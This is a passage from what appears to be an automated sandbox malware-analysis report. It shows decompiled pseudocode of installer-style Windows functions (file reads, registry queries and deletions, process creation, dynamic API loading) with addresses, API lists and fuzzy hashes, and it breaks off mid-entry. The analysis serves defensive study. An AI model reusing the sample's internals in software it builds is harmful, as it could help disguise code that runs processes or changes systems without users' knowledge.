				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061DB( *0x40a01c, 0x414ef0, _t28) == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                                                                                                                                                                                            0x00403375
                                                                                                                                                                                                                            0x0040337e
                                                                                                                                                                                                                            0x00403387
                                                                                                                                                                                                                            0x0040338b
                                                                                                                                                                                                                            0x00403396
                                                                                                                                                                                                                            0x00403396
                                                                                                                                                                                                                            0x0040339e
                                                                                                                                                                                                                            0x004033a5
                                                                                                                                                                                                                            0x004033b7
                                                                                                                                                                                                                            0x004033be
                                                                                                                                                                                                                            0x00403463
                                                                                                                                                                                                                            0x00403463
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004033c4
                                                                                                                                                                                                                            0x004033c7
                                                                                                                                                                                                                            0x004033d3
                                                                                                                                                                                                                            0x004033d7
                                                                                                                                                                                                                            0x00403471
                                                                                                                                                                                                                            0x00403471
                                                                                                                                                                                                                            0x004033dd
                                                                                                                                                                                                                            0x004033e0
                                                                                                                                                                                                                            0x0040343f
                                                                                                                                                                                                                            0x00403445
                                                                                                                                                                                                                            0x00403447
                                                                                                                                                                                                                            0x00403447
                                                                                                                                                                                                                            0x00403459
                                                                                                                                                                                                                            0x00403461
                                                                                                                                                                                                                            0x00403468
                                                                                                                                                                                                                            0x0040346b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004033e2
                                                                                                                                                                                                                            0x004033e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004033eb
                                                                                                                                                                                                                            0x004033f0
                                                                                                                                                                                                                            0x004033f7
                                                                                                                                                                                                                            0x004033fa
                                                                                                                                                                                                                            0x004033fc
                                                                                                                                                                                                                            0x004033fc
                                                                                                                                                                                                                            0x00403409
                                                                                                                                                                                                                            0x00403413
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040341c
                                                                                                                                                                                                                            0x00403423
                                                                                                                                                                                                                            0x0040343b
                                                                                                                                                                                                                            0x00403465
                                                                                                                                                                                                                            0x00403465
                                                                                                                                                                                                                            0x00403425
                                                                                                                                                                                                                            0x00403425
                                                                                                                                                                                                                            0x00403428
                                                                                                                                                                                                                            0x0040342b
                                                                                                                                                                                                                            0x00403431
                                                                                                                                                                                                                            0x00403437
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403439
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403439
                                                                                                                                                                                                                            0x00403437
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403423
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004033f0
                                                                                                                                                                                                                            0x004033e5
                                                                                                                                                                                                                            0x004033e0
                                                                                                                                                                                                                            0x004033d7
                                                                                                                                                                                                                            0x004033be
                                                                                                                                                                                                                            0x00403473
                                                                                                                                                                                                                            0x00403476

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                            • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                                                                                                                                                            • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E004065AF(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
				return 0;
			}








                                                                                                                                                                                                                            0x0040252a
                                                                                                                                                                                                                            0x0040252a
                                                                                                                                                                                                                            0x0040252f
                                                                                                                                                                                                                            0x00402536
                                                                                                                                                                                                                            0x00402538
                                                                                                                                                                                                                            0x0040253f
                                                                                                                                                                                                                            0x00402542
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x00402548
                                                                                                                                                                                                                            0x0040254b
                                                                                                                                                                                                                            0x00402566
                                                                                                                                                                                                                            0x00402596
                                                                                                                                                                                                                            0x00402596
                                                                                                                                                                                                                            0x00402599
                                                                                                                                                                                                                            0x00402568
                                                                                                                                                                                                                            0x0040256c
                                                                                                                                                                                                                            0x00402585
                                                                                                                                                                                                                            0x0040258c
                                                                                                                                                                                                                            0x0040258f
                                                                                                                                                                                                                            0x0040256e
                                                                                                                                                                                                                            0x00402571
                                                                                                                                                                                                                            0x0040257c
                                                                                                                                                                                                                            0x004025f5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402571
                                                                                                                                                                                                                            0x0040256c
                                                                                                                                                                                                                            0x004025fc
                                                                                                                                                                                                                            0x004025fd
                                                                                                                                                                                                                            0x004025fd
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3356406503-0
                                                                                                                                                                                                                            • Opcode ID: 2f519eafec3af35988992028302c1fe2ffbfb85c9afca13b7af9384ace0fec36
                                                                                                                                                                                                                            • Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f519eafec3af35988992028302c1fe2ffbfb85c9afca13b7af9384ace0fec36
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 69%
                                                                                                                                                                                                                            			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0); // executed
					}
				}
				return 0;
			}










                                                                                                                                                                                                                            0x0040138a
                                                                                                                                                                                                                            0x004013fa
                                                                                                                                                                                                                            0x0040139b
                                                                                                                                                                                                                            0x004013a0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004013a2
                                                                                                                                                                                                                            0x004013a3
                                                                                                                                                                                                                            0x004013ad
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00401404
                                                                                                                                                                                                                            0x004013b0
                                                                                                                                                                                                                            0x004013b7
                                                                                                                                                                                                                            0x004013bd
                                                                                                                                                                                                                            0x004013be
                                                                                                                                                                                                                            0x004013c0
                                                                                                                                                                                                                            0x004013c2
                                                                                                                                                                                                                            0x004013b9
                                                                                                                                                                                                                            0x004013b9
                                                                                                                                                                                                                            0x004013ba
                                                                                                                                                                                                                            0x004013ba
                                                                                                                                                                                                                            0x004013c9
                                                                                                                                                                                                                            0x004013cb
                                                                                                                                                                                                                            0x004013f4
                                                                                                                                                                                                                            0x004013f4
                                                                                                                                                                                                                            0x004013c9
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                            • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                                                                                                                                                            • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402434(void* __ebx) {
				long _t7;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x20) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
				if( *(_t23 - 0x20) != __ebx) {
					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t22 = E00402DE6(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                                                                                                                                                                                            0x00402434
                                                                                                                                                                                                                            0x00402434
                                                                                                                                                                                                                            0x00402437
                                                                                                                                                                                                                            0x0040243a
                                                                                                                                                                                                                            0x00402476
                                                                                                                                                                                                                            0x0040247b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040243c
                                                                                                                                                                                                                            0x00402443
                                                                                                                                                                                                                            0x00402447
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x0040244d
                                                                                                                                                                                                                            0x0040245d
                                                                                                                                                                                                                            0x0040245f
                                                                                                                                                                                                                            0x0040247d
                                                                                                                                                                                                                            0x0040247f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402485
                                                                                                                                                                                                                            0x0040247f
                                                                                                                                                                                                                            0x00402447
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseDeleteValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2831762973-0
                                                                                                                                                                                                                            • Opcode ID: a682439353b3c5ec41a25a423dd0a89c01db2d1f450957e818456085bf78355d
                                                                                                                                                                                                                            • Instruction ID: 27a137a867c600d8965633a271772258b7302ea9b92edfc7e4bdeed26dcbc29b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a682439353b3c5ec41a25a423dd0a89c01db2d1f450957e818456085bf78355d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54F06272A04120EBDB11ABB89B4DAAD72A9AF44354F15443BE141B71C0DAFC5D05866E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$EnableShow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1136574915-0
                                                                                                                                                                                                                            • Opcode ID: d682e64da976263d74778dcd61bd470f9ad8341d2b96c4d867934af8fae03e48
                                                                                                                                                                                                                            • Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d682e64da976263d74778dcd61bd470f9ad8341d2b96c4d867934af8fae03e48
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                                                                                                                            0x00405c54
                                                                                                                                                                                                                            0x00405c74
                                                                                                                                                                                                                            0x00405c7c
                                                                                                                                                                                                                            0x00405c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405c87
                                                                                                                                                                                                                            0x00405c8b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3712363035-0
                                                                                                                                                                                                                            • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                                                                                                                                                            • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                                                                                                                            0x00406a3d
                                                                                                                                                                                                                            0x00406a40
                                                                                                                                                                                                                            0x00406a47
                                                                                                                                                                                                                            0x00406a4f
                                                                                                                                                                                                                            0x00406a5b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406a62
                                                                                                                                                                                                                            0x00406a52
                                                                                                                                                                                                                            0x00406a59
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406a6a
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                                                                                                                                              • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                                                                                                                                              • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                                                                                                                                                              • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2547128583-0
                                                                                                                                                                                                                            • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
